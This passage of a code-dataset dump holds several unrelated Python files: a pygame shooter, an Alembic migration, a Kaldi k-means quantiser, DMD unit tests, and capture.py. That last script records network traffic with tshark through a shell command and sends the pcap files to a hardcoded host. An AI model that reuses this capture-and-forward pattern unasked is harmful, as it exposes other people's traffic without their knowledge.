pygame.transform.scale(blue_laser, (20, 50))\ngreenlaser = pygame.transform.scale(greenlaser, (20, 50))\nred_laser = pygame.transform.scale(red_laser, (block_size, block_size))\nblue_enemy_ship = pygame.transform.scale(blue_enemy_ship, (block_size, block_size))\ngrey_enemy_ship = pygame.transform.scale(grey_enemy_ship, (100, 100))\ncosmos = pygame.image.load(\"cosmos.jpg\")\ncosmos = pygame.transform.scale(cosmos, (WIDTH, HEIGHT))\nback = pygame.image.load(\"back!.png\")\nback = pygame.transform.scale(back, (160, 100))\nback.set_colorkey((0, 0, 0))\n\n\nclass Laser:\n def __init__(self, x, y, img):\n self.x = x\n self.y = y\n self.img = img\n self.mask = pygame.mask.from_surface(self.img)\n\n def draw(self, window):\n window.blit(self.img, (self.x, self.y))\n\n def move(self, vel):\n self.y += vel\n\n def off_screen(self, height):\n return not (self.y <= height and self.y >= 0)\n\n def collision(self, obj):\n return collide(self, obj)\n\n\nclass Ship:\n COOLDOWN = 30\n\n def __init__(self, x, y, health=100):\n self.x = x\n self.y = y\n self.health = health\n self.ship_img = None\n self.laser_img = None\n self.lasers = []\n self.cool_down_counter = 0\n\n def draw(self, window):\n window.blit(self.ship_img, (self.x, self.y))\n # those we need to make boundaries for spaceship's movements, so it wouldn't get outside of the screen\n for laser in self.lasers:\n laser.draw(window)\n\n def move_lasers(self, vel, obj):\n self.cooldown()\n for laser in self.lasers:\n laser.move(vel)\n if laser.off_screen(HEIGHT):\n self.lasers.remove(laser)\n elif laser.collision(obj):\n obj.health -= 10\n self.lasers.remove(laser)\n\n def cooldown(self):\n if self.cool_down_counter >= self.COOLDOWN:\n self.cool_down_counter = 0\n elif self.cool_down_counter > 0:\n self.cool_down_counter += 1\n\n def get_width(self):\n return self.ship_img.get_width()\n\n def get_height(self):\n return self.ship_img.get_height()\n\n def shoot(self):\n if self.cool_down_counter == 0:\n laser = Laser(self.x + 15, self.y, self.laser_img)\n self.lasers.append(laser)\n self.cool_down_counter = 1\n\n\nclass Player(Ship):\n def __init__(self, x, y, health=100):\n super().__init__(x, y, health)\n self.ship_img = spaceship\n self.laser_img = red_laser\n self.mask = pygame.mask.from_surface(self.ship_img)\n self.max_health = health\n\n def move_lasers(self, vel, objs):\n self.cooldown()\n for laser in self.lasers:\n laser.move(vel)\n if laser.off_screen(HEIGHT):\n self.lasers.remove(laser)\n else:\n for obj in objs:\n if laser.collision(obj): # remove if laser collide\n objs.remove(obj)\n if laser in self.lasers:\n self.lasers.remove(laser)\n\n def draw(self, window): # implement draw method of the player shifts\n super().draw(window)\n self.healthbar(window)\n\n def healthbar(self, window): # hunam takes self\n pygame.draw.rect(window, (255, 0, 0),\n (self.x, self.y + self.ship_img.get_height() + 10, self.ship_img.get_width(), 10))\n pygame.draw.rect(window, (0, 255, 0), (\n self.x, self.y + self.ship_img.get_height() + 10,\n self.ship_img.get_width() * (self.health / self.max_health),\n 10))\n # 1st RED-length of the player, 2nd GREEN-on tip of the red (be only the length of the health)\n # ex. (255,0,0)-red color; (self.x, self.y + self.ship_img.get_height() + 10- we want to be sure tha health bar is below our player(so we want to get y value of the player add height of the shipp and ten pixels and then start drawing)\n # self.ship_img.get_width() * (self.health/self.max_health - what % of the width we should draw\n\n\nclass Enemy(Ship):\n # those we will need when we add our own pictures\n COLOR_MAP = {\n \"blue\": (blue_enemy_ship, blue_laser),\n \"grey\": (grey_enemy_ship, greenlaser)\n }\n\n def __init__(self, x, y, color, health=100):\n super().__init__(x, y, health)\n self.ship_img, self.laser_img = self.COLOR_MAP[color]\n self.mask = pygame.mask.from_surface(self.ship_img)\n\n def move_enemy(self, vel):\n self.y += vel\n\n def shoot(self):\n if self.cool_down_counter == 0:\n laser = Laser(self.x + 35, self.y, self.laser_img)\n self.lasers.append(laser)\n self.cool_down_counter = 1\n\n\ndef collide(obj1, obj2):\n offset_x = obj2.x - obj1.x # distance from obj1 to obj2 returns vector\n offset_y = obj2.y - obj1.y\n return obj1.mask.overlap(obj2.mask, (offset_x, offset_y)) != None # is obj1 overlapping obj2( given two masks\n\n\ndef main(menu):\n run = True\n fps = 60\n level = 0\n lives = 5\n main_font = pygame.font.SysFont(\"comicsans\", 50)\n lost_font = pygame.font.SysFont(\"comicsans\", 60)\n\n enemies = []\n wave_length = 5\n enemy_vel = 1\n\n player_vel = 5\n laser_vel = 5\n\n player = Player(300, 630)\n\n clock = pygame.time.Clock()\n\n lost = False\n lost_count = 0\n\n def update_window(): # in order to update the screen\n screen.blit(background, (0, 0))\n lives_label = main_font.render(f\"Lives: {lives}\", 1, (255, 255, 255)) # f takes the value of the brackets\n level_label = main_font.render(f\"Level: {level}\", 1, (255, 255, 255))\n\n screen.blit(lives_label, (10, 10))\n screen.blit(level_label, (WIDTH - level_label.get_width() - 10, 10))\n\n for enemy in enemies:\n enemy.draw(screen)\n\n player.draw(screen)\n\n if lost:\n you_lost_label = you_lost_font.render(\"Game over\", 1, (255, 255, 255))\n screen.blit(you_lost_label, (WIDTH / 2 - you_lost_label.get_width() / 2, 350))\n\n pygame.display.update()\n\n while run:\n clock.tick(fps)\n update_window()\n # if you lost then FREEZE\n if lives <= 0 or player.health <= 0:\n lost = True\n lost_count += 1\n\n if lost:\n if lost_count > fps * 3:\n run = False\n else:\n continue\n\n if len(enemies) == 0:\n level += 1\n wave_length += 5\n enemy_vel += 1\n # this is for the enemies fall down at random positions positions\n for i in range(wave_length):\n enemy = Enemy(random.randrange(50, WIDTH - 100), random.randrange(-1500, -100),\n random.choice([\"grey\", \"blue\"]))\n enemies.append(enemy)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n quit()\n\n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT] and player.x - player_vel > 0: # left\n player.x -= player_vel\n if keys[pygame.K_RIGHT] and player.x + player_vel + player.get_width() < WIDTH: # right\n player.x += player_vel\n if keys[pygame.K_UP] and player.y - player_vel > 0: # up\n player.y -= player_vel\n if keys[pygame.K_DOWN] and player.y + player_vel + player.get_height() + 15 < HEIGHT: # down\n player.y += player_vel\n if keys[pygame.K_SPACE]:\n player.shoot()\n if keys[pygame.K_ESCAPE]:\n game.menu()\n\n for enemy in enemies[:]:\n # everytime they are on the screen move them down with their velocities\n enemy.move_enemy(enemy_vel)\n # everytime we don't kill the enemies we get lesser number of lives\n enemy.move_lasers(laser_vel, player)\n\n if random.randrange(0, 2 * 60) == 1:\n enemy.shoot()\n\n if collide(enemy, player):\n if player.health == 10:\n if lives <= 0:\n lost = True\n else:\n player.health = player.max_health\n lives -= 1\n enemies.remove(enemy)\n else:\n player.health -= 10\n enemies.remove(enemy)\n elif enemy.y + enemy.get_height() > HEIGHT:\n if lives <= 0:\n lost = True\n else:\n lives -= 1\n enemies.remove(enemy)\n\n player.move_lasers(-laser_vel, enemies) # strelyat' vverh a ne vniz\n pygame.quit()\n\n\nfps = 60\n\n\ndef help(menu):\n screen.blit(cosmos, (0, 0))\n screen.blit(back, (0, 600))\n text = you_lost_font.render(\"helpdkjanckjjd\", True, white)\n screen.blit(text, (170, 100))\n for e in pygame.event.get():\n if e.type == pygame.MOUSEBUTTONDOWN:\n pos = pygame.mouse.get_pos()\n rect = back.get_rect()\n if rect.collidepoint(pos):\n game.menu()\n pygame.display.flip()\n clock.tick(fps)\n\n\ndef tool(menu):\n screen.blit(cosmos, (0, 0))\n screen.blit(back, (0, 600))\n text = you_lost_font.render(\"tool\", True, white)\n screen.blit(text, (170, 100))\n for e in pygame.event.get():\n if e.type == pygame.MOUSEBUTTONDOWN:\n pos = pygame.mouse.get_pos()\n rect = back.get_rect()\n if rect.collidepoint(pos):\n menu.state = \"menu\"\n print(\"Tried to return to menu\")\n pygame.display.flip()\n clock.tick(fps)\n\n\nclass Menu:\n state = \"menu\"\n\n def __init__(self, punkts=[200, 300, 'Punkts', white, red, 2]):\n self.punkts = punkts\n\n def render(self, poverhnost, font, num_punkt): # отрисовка\n for i in self.punkts:\n if num_punkt == i[5]: # если курсор и текущий эелемент совпадает окрашивается в красный\n poverhnost.blit(font.render(i[2], 1, i[4]), (i[0], i[1]))\n else:\n poverhnost.blit(font.render(i[2], 1, i[3]), (i[0], i[1])) # если нет то не окрашивается\n\n def menu(self):\n global state\n fps = 60\n done = True\n font_menu = pygame.font.SysFont(\"comicsans\", 120)\n punkt = 0\n pygame.key.set_repeat(0, 0) # отключили залипание курсора\n pygame.mouse.set_visible(True) # сделали видимым курсор\n while done:\n if self.state == \"menu\":\n mp = pygame.mouse.get_pos()\n for i in self.punkts:\n if mp[0] > i[0] and mp[0] < i[0] + 300 and mp[1] > i[1] and mp[1] < i[\n 1] + 100: # checking пересекается курсор в пунктом меню или нет\n punkt = i[5]\n screen.blit(cosmos, (0, 0))\n self.render(screen, font_menu, punkt)\n\n for e in pygame.event.get():\n if e.type == pygame.QUIT:\n sys.exit()\n if e.type == pygame.KEYDOWN:\n if e.key == pygame.K_ESCAPE:\n sys.exit()\n if e.key == pygame.K_UP:\n if punkt > 0:\n punkt -= 1\n if e.key == pygame.K_DOWN:\n if punkt > len(self.punkts) - 1:\n punkt += 1\n if e.type == pygame.MOUSEBUTTONDOWN and e.button == 1:\n if punkt == 0: # если нажать гейм то играет\n self.state = \"play\"\n if punkt == 1: # если нажать хелп выводит текст\n self.state = \"tool\"\n if punkt == 2:\n self.state = \"help\"\n\n pygame.display.flip()\n clock.tick(fps)\n\n if self.state == \"play\":\n main(self)\n\n if self.state == \"help\":\n help(self)\n\n if self.state == \"tool\":\n tool(self)\n\n\npunkts = [(240, 220, 'Game', white, red, 0),\n (260, 340, 'Tools', white, red, 1),\n (280, 460, 'Help', white, red, 2)]\ngame = Menu(punkts)\ngame.menu()","sub_path":"pygame_olala.py","file_name":"pygame_olala.py","file_ext":"py","file_size_in_byte":13435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"182744233","text":"\"\"\"movies table\n\nRevision ID: 76dfc0fdc93e\nRevises: \nCreate Date: 2019-06-29 18:27:54.506377\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '76dfc0fdc93e'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('Genres')\n op.drop_table('Directors')\n op.drop_table('sqlite_sequence')\n op.drop_table('GenreMovieMap')\n op.drop_table('Movies')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('Movies',\n sa.Column('MovieID', sa.INTEGER(), nullable=False),\n sa.Column('Name', sa.TEXT(), nullable=True),\n sa.Column('DirectorID', sa.INTEGER(), nullable=True),\n sa.Column('IMDBScore', sa.REAL(), nullable=True),\n sa.Column('Popularity', sa.REAL(), nullable=True),\n sa.Column('CreatedOn', sa.TIMESTAMP(), nullable=True),\n sa.Column('LastModifiedDt', sa.TIMESTAMP(), nullable=True),\n sa.PrimaryKeyConstraint('MovieID')\n )\n op.create_table('GenreMovieMap',\n sa.Column('GenreMovieMapID', sa.INTEGER(), nullable=False),\n sa.Column('GenreID', sa.INTEGER(), nullable=True),\n sa.Column('MovieID', sa.INTEGER(), nullable=True),\n sa.Column('CreatedOn', sa.TIMESTAMP(), nullable=True),\n sa.PrimaryKeyConstraint('GenreMovieMapID')\n )\n op.create_table('sqlite_sequence',\n sa.Column('name', sa.NullType(), nullable=True),\n sa.Column('seq', sa.NullType(), nullable=True)\n )\n op.create_table('Directors',\n sa.Column('DirectorID', sa.INTEGER(), nullable=False),\n sa.Column('Name', sa.TEXT(), nullable=True),\n sa.Column('CreatedOn', sa.TIMESTAMP(), nullable=True),\n sa.PrimaryKeyConstraint('DirectorID')\n )\n op.create_table('Genres',\n sa.Column('GenreID', sa.INTEGER(), nullable=False),\n sa.Column('Genre', sa.TEXT(), nullable=False),\n sa.Column('CreatedOn', sa.TIMESTAMP(), nullable=True),\n sa.PrimaryKeyConstraint('GenreID')\n )\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/76dfc0fdc93e_movies_table.py","file_name":"76dfc0fdc93e_movies_table.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"504887209","text":"#!/usr/bin/env python3\nimport subprocess\nimport socket\nfrom multiprocessing import Process\n\n#CONFIGURATION VARS\n#root=subprocess.run(\"pwd\",shell=True,stdout=subprocess.PIPE).stdout.decode(\"utf-8\")[:-1]\n#tsharkroot=subprocess.run(\"which tshark\",shell=True,stdout=subprocess.PIPE).stdout.decode(\"utf-8\")[:-1]\n\n#CONFIGURATION VARS\ncmd = \"tshark -V -T fields -e frame.time_epoch -e ip.src -e ip.dst -e eth.src -e eth.dst -e frame.protocols -e http.host -F pcap -c 100 -w\" #tshark.pcap > tshark.out\"\ndef sendFile(filename):\n\tprint(\"asynch hit\")\n\tsoc = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\tsoc.connect((\"192.168.1.204\",35380))\n\tfp = open(filename,\"rb\")\n\tbuf = fp.read()\n\tfp.close()\n\tprint(\"sending \" + str(len(buf)))\n\tsoc.send(str(len(buf)).encode('utf-8'))\n\t#soc.close()\n\t#soc = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\t#soc.connect((\"192.168.1.204\",35380))\n\tsoc.send(buf)\n\tsoc.close()\n\t#soc = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\t#soc.connect((\"127.0.0.1\",35380))\n\t#soc.send(\"&$%#@@#%$&\".encode('utf-8'))\n\t#soc.close()\n\ndef main():\n\tcount = 0\n\tglobal cmd\n\twhile count < 2:\n\t\tpacketCapFile = \"tshark\" + str(count) + \".pcap\"\n\t\tpacketOutFile = \"outTshark\" + str(count) + \".out\"\n\t\tsubprocess.run(cmd + packetCapFile + \">\" + packetOutFile,shell=True)\n\t\tcount = count +1\n\t\tp = Process(target=sendFile,args=(packetCapFile,))\n\t\tp.start()\n\nmain()\n","sub_path":"Client/capture.py","file_name":"capture.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"351216691","text":"#!/home/ga96yar/tensorflow_py3/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nCalculate k-means.\n\"\"\"\nimport os\nimport sys\nimport argparse\nimport pandas as pd\nimport pickle\nimport copy\nimport numpy as np\nimport collections\nfrom kaldi_io import kaldi_io\nfrom sklearn.cluster import MiniBatchKMeans, KMeans\nfrom scipy.cluster.vq import vq, whiten\nfrom KaldiHelper.MiscHelper import Misc\nfrom KaldiHelper.IteratorHelper import DataIterator\n\n\nclass KmeansVq(object):\n def __init__(self, cluster, multiple=False, whitening=False, MiniBatch=True, KaldiFormatting=False):\n self._kaldi_formatting = KaldiFormatting\n self._multiple = multiple\n self._whitening = whitening\n self._MiniBatch = MiniBatch\n self._num_cluster = cluster\n self._dict_codebook = None\n self.codebook = None\n # self._load_codebook_pd('codebook.pd')\n # self._build_dataset()\n\n def create_codebook(self, nj, data_folder):\n # create keys for enumeration\n if self._multiple:\n keys = ['energy', 'raw', 'delta', 'dd']\n else:\n keys = ['simple']\n\n # init 4 minibatchkmeans for energy, raw, delta and delta delta features\n dict_kmeans = {}\n for key in keys:\n dict_kmeans[key] = MiniBatchKMeans(n_clusters=self._num_cluster, init='random', batch_size=200,\n verbose=1, reassignment_ratio=0.001, max_no_improvement=100,\n n_init=self._num_cluster)\n\n # create dataiterator\n dataset = DataIterator(nj, data_folder)\n\n # iterator and do kmeans\n df = pd.DataFrame()\n while True:\n try:\n data_path = dataset.next_file()\n print(data_path)\n for key, mat in kaldi_io.read_mat_ark(data_path):\n tmp_df = pd.DataFrame(mat)\n df = df.append(tmp_df.sample(int(tmp_df.shape[0] * 1.0)))\n\n if df.shape[0] > 1000:\n # so kmeans for every features\n if self._multiple:\n dict_kmeans['energy'].partial_fit(whiten(df.values[:, [0, 13, 26]]))\n dict_kmeans['raw'].partial_fit(whiten(df.values[:, range(1, 13, 1)]))\n dict_kmeans['delta'].partial_fit(whiten(df.values[:, range(14, 26, 1)]))\n dict_kmeans['dd'].partial_fit(whiten(df.values[:, range(27, 39, 1)]))\n else:\n if self._whitening:\n dict_kmeans['simple'].partial_fit(whiten(df.values))\n else:\n dict_kmeans['simple'].partial_fit(df.values)\n self._dict_codebook = dict_kmeans\n df = pd.DataFrame() # clean up\n except StopIteration:\n break\n\n def load_pickle_codebook(self, infile):\n self._dict_codebook = pickle.loads(infile.read())\n\n def save_pickle_codebook(self, outfile):\n outfile.write(pickle.dumps(self._dict_codebook))\n\n def load_codebook(self, path):\n if not self._kaldi_formatting:\n raise TypeError\n for key, mat in kaldi_io.read_mat_ark(path):\n self.codebook = mat\n\n def save_codebook(self, path):\n if not self._kaldi_formatting:\n raise TypeError\n # prepare codebook for saving\n path_new = str.split(path, '.')\n assert len(self._dict_codebook) > 0\n\n if len(self._dict_codebook) > 1:\n # prepare codebook for multiple vqs\n self.codebook = np.zeros([self._num_cluster, 39]) # 39 is the feature dimension\n keys = ['energy', 'raw', 'delta', 'dd']\n dict_indicies = {'energy': [0, 13, 26], 'raw': range(1, 13, 1), 'delta': range(14, 26, 1),\n 'dd': range(27, 39, 1)}\n for key in keys:\n self.codebook[:, dict_indicies[key]] = self._dict_codebook[key].cluster_centers_\n path = path_new[0] + '_multiple.' + path_new[1]\n else:\n self.codebook = self._dict_codebook['simple'].cluster_centers_\n path = path_new[0] + '_single.' + path_new[1]\n\n with open(path, 'wb') as f:\n # print(self.codebook)\n kaldi_io.write_mat(f, self.codebook, key='cb')\n\n def vq_data(self, nj, data_folder, output_folder):\n # vqing traing data\n assert self.codebook.shape[0] > 0\n print('VQing training data...')\n\n dataset = DataIterator(nj, data_folder)\n\n keys = []\n dict_vq, dict_indicies = {}, {}\n if self._multiple:\n keys = ['energy', 'raw', 'delta', 'dd']\n dict_indicies = {'energy': [0, 13, 26], 'raw': range(1, 13, 1), 'delta': range(14, 26, 1),\n 'dd': range(27, 39, 1)}\n else:\n keys = ['simple']\n dict_indicies = {'simple': range(0, 39)}\n\n for key in keys:\n dict_vq[key] = self.codebook[:, dict_indicies[key]]\n\n tmp_dict = {}\n labels_all = []\n phoneme_all = []\n count = 1\n while True:\n try:\n data_path = dataset.next_file()\n print(\"Data path is in \", data_path)\n for key, mat in kaldi_io.read_mat_ark(data_path):\n if self._multiple:\n # getting label for every vq\n df = pd.DataFrame(\n vq(whiten(mat[:, dict_indicies['energy']]), dict_vq['energy'])[0][:, np.newaxis])\n df = pd.concat([df, pd.DataFrame(vq(whiten(mat[:, dict_indicies['raw']]),\n dict_vq['raw'])[0][:, np.newaxis])], axis=1)\n df = pd.concat([df, pd.DataFrame(vq(whiten(mat[:, dict_indicies['delta']]),\n dict_vq['delta'])[0][:, np.newaxis])], axis=1)\n df = pd.concat([df, pd.DataFrame(vq(whiten(mat[:, dict_indicies['dd']]),\n dict_vq['dd'])[0][:, np.newaxis])], axis=1)\n else:\n if self._whitening:\n df = pd.DataFrame(vq(whiten(mat[:, :39]), dict_vq['simple'])[0][:, np.newaxis])\n labels_all.append(df.values)\n else:\n df = pd.DataFrame(vq(mat[:, :39], dict_vq['simple'])[0][:, np.newaxis])\n labels_all.append(df.values)\n\n if np.shape(mat)[1] > 39:\n phoneme_all.append(mat[:, 39])\n\n # add to tmp_dict for later saving\n tmp_dict[key] = df\n\n # ordered dict\n od = collections.OrderedDict(sorted(tmp_dict.items()))\n\n # save label-stream from vq\n with open(output_folder + '/feats_vq_' + str(count), 'wb') as f:\n for key, mat in list(od.items()):\n kaldi_io.write_mat(f, mat.values.astype(np.float32, copy=False), key=key)\n\n tmp_dict = {}\n count += 1\n\n except StopIteration:\n # calc MI\n if False:\n misc = Misc()\n labels_all = np.concatenate(labels_all)\n # labels_all = np.reshape(labels_all, [np.shape(labels_all)[0] * np.shape(labels_all)[1]],\n # np.shape(labels_all)[2])\n phoneme_all = np.concatenate(phoneme_all)\n # phoneme_all = np.reshape(phoneme_all, [np.shape(phoneme_all)[0] * np.shape(phoneme_all)[1]],\n # np.shape(phoneme_all)[2])\n print(misc.calculate_mi(labels_all, phoneme_all))\n break\n\n\nclass KmeansVqMmi(object):\n\n def __init__(self, cb_size):\n self._cbsize = cb_size\n self._weights = None\n self._dataset = None\n self._mi = None\n self._delta = None\n self._sorted_labels = None\n\n # init methods\n # self._load_weights(path_weights)\n # self._load_dataset(path_data)\n\n def _get_sort_label_stream(self, stream, cb_size):\n \"\"\"\n\n :param stream: input label stream\n :param cb_size: size of codebook\n :return: return occupancy of label stream\n \"\"\"\n\n # define counter array for labels\n count_array = np.zeros(cb_size)\n\n # count occupancy\n for element in stream:\n count_array[element] += 1.0\n\n # sort of accupancy and reverse result (from big to small)\n occupany = np.argsort(count_array)[::-1]\n\n # some debugging\n # print(count_array)\n # print(occupany)\n\n return occupany\n\n def _modify_weight(self, weights, index_tuple, delta):\n \"\"\"\n :param index_tuple: index tuple\n :param delta: delta parameter\n \"\"\"\n\n weights[index_tuple[0], index_tuple[1]] += delta\n\n return weights\n\n def _load_weights(self, path):\n for key, mat in kaldi_io.read_mat_ark(path):\n self._weights = mat\n\n def _load_dataset(self, path):\n for key, mat in kaldi_io.read_mat_ark(path):\n self._dataset = mat\n\n def create_dataset(self, nj, frac, path_data, output_folder):\n\n dataset = DataIterator(nj, path_data)\n\n data = []\n misc = Misc()\n count_size = 0\n while True:\n try:\n data_path = dataset.next_file()\n print(data_path)\n for key, mat in kaldi_io.read_mat_ark(data_path):\n df_mat = pd.DataFrame(mat)\n np_mat = df_mat.sample(frac=frac).values\n # np_mat[:, 39] = misc.trans_vec_to_phones(np_mat[:, 39])\n data.append(np_mat)\n\n except StopIteration:\n data_sample = np.concatenate(data)\n print(data_sample.shape)\n data_dict = {}\n data_dict['data'] = data_sample\n\n with open(output_folder + '/dataset.mat', 'wb') as f:\n for key, mat in list(data_dict.items()):\n kaldi_io.write_mat(f, mat.astype(np.float32, copy=False), key=key)\n\n break\n\n def do_mmi(self):\n\n misc = Misc()\n\n i = 0 # sorted index\n j = 0 # activation index\n iter = 0\n print('Iteration: ' + str(iter))\n\n while j < 39:\n print('Activation: ' + str(j))\n tmp_weight = copy.deepcopy(self._weights)\n new_weights = self._modify_weight(tmp_weight,\n (self._sorted_labels[i], j), self._delta)\n new_labels, _ = vq(whiten(self._dataset[:, :39]), new_weights)\n\n mi = misc.calculate_mi(np.expand_dims(new_labels, 1), self._dataset[:, 39])\n # print('Tmp MI: ' + str(mi))\n\n if mi - self._mi > 0:\n self._weights = new_weights\n self._mi = mi\n self._save_weights()\n print(self._mi)\n j += 1\n self._delta = np.abs(self._delta)\n else:\n if self._delta < 0:\n self._delta = np.abs(self._delta)\n j += 1\n\n else:\n self._delta = -self._delta\n\n if j == 39:\n j = 0\n i += 1\n print('Label number: ' + str(i))\n\n if i == 400:\n i = 0\n iter += 1\n # x.append(iter)\n # y.append(mi_old)\n # sc.set_offsets(np.c_[x, y])\n # fig.canvas.draw_idle()\n # plt.pause(0.1)\n print('Iteration: ' + str(iter))\n if iter > 20:\n break\n print('Creating new sorted labels...')\n self._sorted_labels = self._get_sort_label_stream(new_labels, self._cbsize)\n\n def init_training(self, path_data, path_weights, delta):\n self._load_weights(path_weights)\n self._load_dataset(path_data)\n self._delta = delta\n assert self._weights is not None or self._dataset is not None\n\n misc = Misc()\n\n label, _ = vq(whiten(self._dataset[:, :39]), self._weights)\n\n # calc mutual information\n self._mi = misc.calculate_mi(label, self._dataset[:, 39])\n\n print('Init MI: ' + str(self._mi))\n\n codebook_size = 400\n\n self._sorted_labels = self._get_sort_label_stream(label, self._cbsize)\n\n def _save_weights(self):\n weights_dict = {'weights': self._weights}\n with open('weights_tmp.mat', 'wb') as f:\n for key, mat in list(weights_dict.items()):\n kaldi_io.write_mat(f, mat.astype(np.float32, copy=False), key=key)\n\n\ndef main(arguments):\n parser = argparse.ArgumentParser(description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument(\"-n\", \"--numjobs\", nargs=2, type=int, help=\"number of jobs\", default=10)\n parser.add_argument(\"-k\", \"--kaldiformat\", help=\"use kaldi-formatted codebook-file\", action=\"store_true\")\n subparsers = parser.add_subparsers(help='sub-command train|vq', dest='command')\n\n parser_train = subparsers.add_parser('train', help='training kmeans')\n parser_train.add_argument(\"-m\", \"--multiple\", action=\"store_true\")\n parser_train.add_argument(\"num_classes\", type=int, help=\"number of classes or clusters\")\n parser_train.add_argument('inputdir', help=\"Input Files\", type=str)\n parser_train.add_argument('-o', '--outfile', help=\"Output file\",\n default=sys.stdout, type=argparse.FileType('wb'))\n\n parser_vq = subparsers.add_parser('vq', help='quanitzing a dataset')\n parser_vq.add_argument('codebook', help=\"codebook file\", type=argparse.FileType('rb'))\n parser_vq.add_argument('outdir', help=\"Output directory\", type=str)\n\n args = parser.parse_args(arguments)\n\n for arg in vars(args):\n print (\" Argument {:14}: {}\".format(arg, getattr(args, arg)))\n\n if args.command == 'train':\n print(' ---- training:')\n if not os.path.isdir(args.inputdir):\n raise AssertionError(\"inputdir {0} is not a directory\".format(args.inputdir))\n kmeans = KmeansVq(args.num_classes, multiple=args.multiple)\n kmeans.create_codebook(args.numjobs, args.inputdir)\n kmeans.save_pickle_codebook(args.outfile)\n else:\n print('vq not yet implemented')\n\nif __name__ == \"__main__\":\n sys.exit(main(sys.argv[1:]))\n\n # tmp.load_codebook('codebook_single.mat')\n # tmp.vq_data(35, '../plain_feats_20k/train_20k', '../plain_feats/backup_20k_vq/vq_train')\n # tmp.vq_data(30, '../plain_feats_20k/test', '../plain_feats/backup_20k_vq/vq_test')\n # tmp.mutual_information(35)\n # tmp.multiple_vq_data(20, 'train_20kshort_nodup', '../plain_feats/backup_20k_vq/vq_train')\n\n # tmp.vq_data(20, 'train_20kshort_nodup', '../exp/test_400_0/vq_train')\n # tmp.vq_data(30, 'test', '../exp/test_400_0/vq_test')\n","sub_path":"KaldiHelper/KmeansVqHelper.py","file_name":"KmeansVqHelper.py","file_ext":"py","file_size_in_byte":15374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"2786936","text":"from builtins import range\nfrom unittest import TestCase\nimport numpy as np\nimport os\n\nfrom pydmd.dmdoperator import DMDOperator\nfrom pydmd.utils import compute_tlsq\n\nimport matplotlib.pyplot as plt\n\n# 15 snapshot with 400 data. The matrix is 400x15 and it contains\n# the following data: f1 + f2 where\n# f1 = lambda x,t: sech(x+3)*(1.*np.exp(1j*2.3*t))\n# f2 = lambda x,t: (sech(x)*np.tanh(x))*(2.*np.exp(1j*2.8*t))\nsample_data = np.load('tests/test_datasets/input_sample.npy')\n\nclass TestDmdOperator(TestCase):\n def test_constructor(self):\n operator = DMDOperator(svd_rank=2, exact=True, forward_backward=False,\n rescale_mode='auto', sorted_eigs=False)\n\n assert operator._svd_rank == 2\n assert operator._exact == True\n assert operator._forward_backward == False\n assert operator._rescale_mode == 'auto'\n\n def test_noncompute_error(self):\n operator = DMDOperator(svd_rank=2, exact=True, forward_backward=False,\n rescale_mode='auto', sorted_eigs=False)\n\n with self.assertRaises(ValueError):\n operator.shape\n\n with self.assertRaises(ValueError):\n operator.Lambda\n\n with self.assertRaises(ValueError):\n operator.modes\n\n with self.assertRaises(ValueError):\n operator.eigenvalues\n\n with self.assertRaises(ValueError):\n operator.eigenvectors\n\n with self.assertRaises(ValueError):\n operator.as_numpy_array\n\n def test_compute_operator(self):\n operator = DMDOperator(svd_rank=0, exact=True, forward_backward=False,\n rescale_mode='auto', sorted_eigs=False)\n operator.compute_operator(np.ones((3, 3)), np.ones((3, 3)))\n\n assert operator.as_numpy_array is not None\n assert operator.eigenvalues is not None\n assert operator.eigenvectors is not None\n assert operator.modes is not None\n assert operator.Lambda is not None\n\n # test that a value of 'auto' in rescale_mode is replaced by the singular\n # values of X\n def test_rescalemode_auto_singular_values(self):\n operator = DMDOperator(svd_rank=0, exact=True, forward_backward=False,\n rescale_mode='auto', sorted_eigs=False)\n operator.compute_operator(np.ones((3, 3)), np.ones((3, 3)))\n np.testing.assert_almost_equal(operator._rescale_mode, np.array([3.]),\n decimal=1)\n\n def test_call(self):\n operator = DMDOperator(svd_rank=2, exact=True, forward_backward=False,\n rescale_mode=None, sorted_eigs=False)\n\n X = sample_data[:, :-1]\n Y = sample_data[:, 1:]\n X, Y = compute_tlsq(X, Y, 0)\n\n operator.compute_operator(X,Y)\n\n expected = np.array([-0.47643628 + 0.87835227j, -0.47270971 + 0.88160808j])\n\n np.testing.assert_almost_equal(operator(np.ones(2)), expected, decimal=6)\n\n def test_compute_eigenquantities_wrong_rescalemode(self):\n operator = DMDOperator(svd_rank=0, exact=True, forward_backward=False,\n rescale_mode=4, sorted_eigs=False)\n with self.assertRaises(ValueError):\n operator.compute_operator(np.ones((3, 3)), np.ones((3, 3)))\n\n operator = DMDOperator(svd_rank=0, exact=True, forward_backward=False,\n rescale_mode=np.ones((4,)), sorted_eigs=False)\n with self.assertRaises(ValueError):\n operator.compute_operator(np.ones((3, 3)), np.ones((3, 3)))\n\n def test_plot_operator(self):\n operator = DMDOperator(svd_rank=2, exact=True, forward_backward=False,\n rescale_mode=None, sorted_eigs=False)\n\n X = sample_data[:, :-1]\n Y = sample_data[:, 1:]\n X, Y = compute_tlsq(X, Y, 0)\n\n operator.compute_operator(X, Y)\n operator.plot_operator()\n 